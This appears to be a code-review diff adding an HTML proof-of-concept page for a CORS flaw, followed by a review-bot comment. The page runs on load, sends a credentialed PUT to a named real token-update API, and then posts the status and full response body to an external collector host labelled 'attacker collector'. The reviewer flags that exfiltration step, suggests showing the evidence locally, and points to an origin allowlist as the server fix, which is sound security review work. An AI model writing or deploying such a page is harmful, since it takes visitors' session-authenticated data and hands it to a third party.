Expand file tree Collapse file tree 1 file changed +50
-0
lines changed Original file line number Diff line number Diff line change 1+ <!doctype html>
2+ < html >
3+ < head > < meta charset ="utf-8 "> < title > CORS PUT PoC</ title > </ head >
4+ < body >
5+ < h3 > CORS PUT PoC</ h3 >
6+ < script >
7+ async function runPoC ( ) {
8+ try {
9+ const resp = await fetch ( 'https://studio-api.jup.ag/update-token-content' , {
10+ method : 'PUT' ,
11+ credentials : 'include' , // include cookies/session
12+ headers : {
13+ 'Content-Type' : 'application/json'
14+ } ,
15+ body : JSON . stringify ( {
16+ op : 'poc' ,
17+ data : 'cors-test'
18+ } )
19+ } ) ;
20+
21+ const status = resp . status ;
22+ let text ;
23+ try {
24+ text = await resp . text ( ) ;
25+ } catch ( e ) {
26+ text = '[unable to read body] ' + e ;
27+ }
28+
29+ // Exfiltrate response to attacker collector
30+ await fetch ( 'https://avicoder.me/collect' , {
31+ method : 'POST' ,
32+ mode : 'cors' ,
33+ headers : { 'Content-Type' : 'application/json' } ,
34+ body : JSON . stringify ( {
35+ target : 'https://studio-api.jup.ag/update-token-content' ,
36+ status,
37+ body : text
38+ } )
39+ } ) ;
40+
41+ console . log ( 'PoC finished' , status , text ) ;
42+ } catch ( err ) {
43+ console . error ( 'PoC error' , err ) ;
44+ }
45+ }
46+
47+ runPoC ( ) ;
48+ </ script >
49+ </ body >
50+ </ html >
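Review bot: The second `fetch` (diff lines 29–39) posts the status and full response body of a credentialed request to an external collector host, so anyone who opens this page with a live session has their response data handed to a third party; showing that the cross-origin response is readable does not need that step. Keep the evidence local, for example `document.body.append(Object.assign(document.createElement('pre'), { textContent: status + '\n' + text }));`, and call `runPoC()` from a button instead of on load at diff line 47. The `application/json` content type forces a preflight, so a rejected preflight and a plain network failure both end in the same `catch` and the result is ambiguous; a header comment naming the `Access-Control-Allow-Origin` and `Access-Control-Allow-Credentials` values the test expects would make the outcome interpretable. If the read does succeed, the server-side remedy is presumably an explicit origin allowlist for credentialed requests rather than a reflected origin, which this page cannot confirm on its own.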